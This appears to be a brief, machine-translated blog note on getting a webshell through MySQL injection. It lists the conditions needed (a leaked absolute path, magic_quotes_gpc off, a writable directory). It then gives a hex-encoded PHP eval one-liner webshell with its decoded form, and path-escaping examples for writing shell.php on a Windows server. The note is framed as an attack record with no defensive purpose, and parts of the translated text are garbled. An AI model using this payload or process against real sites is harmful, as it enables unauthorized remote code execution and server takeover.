mysql injection problems getshell Note

To know the absolute path to the site, by error page, phpinfo and disclosure of sensitive information obtained 404

gpc may want to close, following a brief introduction gpc:

magic_quotes_gpc = On, PHP parser will automatically post, get, cookie over the data to increase the escape character "\" to ensure that these data do not cause programs, in particular database statement because special characters (characters considered php) pollution caused by                                      

The fatal error 

Have write access to the directory

 

General operation is not introduced, the operation of the simple recording process

0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e hexadecimal encoding <? Php eval ($ _ POST [ 'test'])?>

When the write shell must pay attention to the path either by / backslash, use \\ escape into a \

for example

C:/phpStudy/WWW/shell.php

C:\\phpStudy\\WWW\\shell.php

 

Reference links:

https://www.cnblogs.com/HKUI/articles/3145085.html

https://blog.csdn.net/qianduan520/article/details/52383214

Guess you like

Origin www.cnblogs.com/weaKn19ht/p/12063950.html